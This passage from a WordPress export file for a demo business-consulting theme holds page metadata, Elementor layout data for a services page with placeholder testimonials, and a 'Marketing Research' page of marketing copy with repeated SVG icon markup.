<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>885</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:16:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:16:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services-with-icon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d5a76aa","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"234f86e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1cf82f6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ce2318b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5510dd0","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ef1670e","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9a1cf24","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"063a9d3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"72f750e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"849b54f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c431466","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e0e8d01","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2269d28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"56e56e3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"390869d","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"075d0cf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4bdc329","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"d45a6c2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a93d254","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"41d2371","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"a342583","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"4685821","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"34b430f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"793fbd6","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ed2b68f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":48,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"58be6ce","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"798624b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e92783c","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-icon.jpg","id":890},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"180","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"374524a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4de5108","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f57a371","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9728125","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"00c712c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"2dd99d7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"870bb75","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"40edabd","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"cfe5e81","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"a078a65","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"79d9b22","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e929e8c","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"81d098c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8de62dc","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"07f2dc1","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"be75dc6","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"bold","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]},"typography_typography":"custom","typography_font_family":"Amiri","typography_font_size":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"91c3045","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"5c296ee","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:6:"column";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:23;s:19:"_inline_size_tablet";i:14;}}s:8:"advanced";a:2:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:14:"subtitle_style";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:7;}s:14:"section_layout";a:4:{s:6:"layout";i:6;s:3:"gap";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:7;s:14:"padding_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:2:{s:18:"style_icon_section";a:2:{s:9:"is_border";i:8;s:9:"icon_size";i:8;}s:21:"style_content_section";a:2:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:5;s:15:"_padding_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Marketing Research</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/</link>
		<pubDate>Mon, 14 Sep 2020 07:28:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=898</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home2-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">
Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.
Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
